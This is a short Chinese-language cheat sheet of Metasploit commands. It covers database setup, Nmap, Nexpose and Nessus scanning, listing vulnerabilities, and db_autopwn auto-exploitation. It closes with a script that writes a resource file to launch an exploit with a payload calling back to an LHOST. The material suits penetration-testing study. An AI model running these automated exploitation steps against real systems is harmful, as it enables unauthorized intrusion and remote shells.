1.连接数据并显示一些信息
  db_connet username:password@ip address/database name
  db_destroy 同上
  db_import 文件名字
  db_hosts -c address,svcs,vulns   // 显示ip地址,服务器,漏洞
  db_vlns   // 显示漏洞名字
  2.nmap扫描
  db_nmap -sS -nP ip address
  db_nmap -h
  3.nexpose在metasploit的使用
  load nexpose // 加载nexpose插件
  nexpose -h
  nexpose_connect 用户名:密码@ip地址:端口号  认证字符
  nexpose_scan ip地址
  db_hosts -c address     // 显示漏洞信息
  4.nessus在metasploit的使用
  load nessus
  nessus_connect 用户名:密码@ip地址:端口号  认证字符
  nessus_policy_list //显示策略列表
  nessus_scan_new
  nessus_scan_new 2 bridge_scan ip地址
  nessus_scan_status   //显示状态
  nessus_report_list    // 报告列表
  nessus_report_get 报告名字   // 显示报告
  db_hosts -c address,svcs,vlns
  db_autopwn -e -t -r -x -p // 自动运行检测数据库中得到的漏洞
  5.搜索漏洞
  search mysql   // 搜索mysql的漏洞
  6.保存metasploit用过的命令到文件
  makerc  路径/文件名字
  自动审计,运行检测
  7.脚本如下
  echo use 漏洞名字 >autoexploit.rc
  echo set RHOST IP地址 >> autoexploit.rc
  echo set PAYLOAD shellcode名字 >> autoexploit.rc
  echo set LHOST IP地址 >> autoexploit.rc
  echo exploit >> autoexploit.rc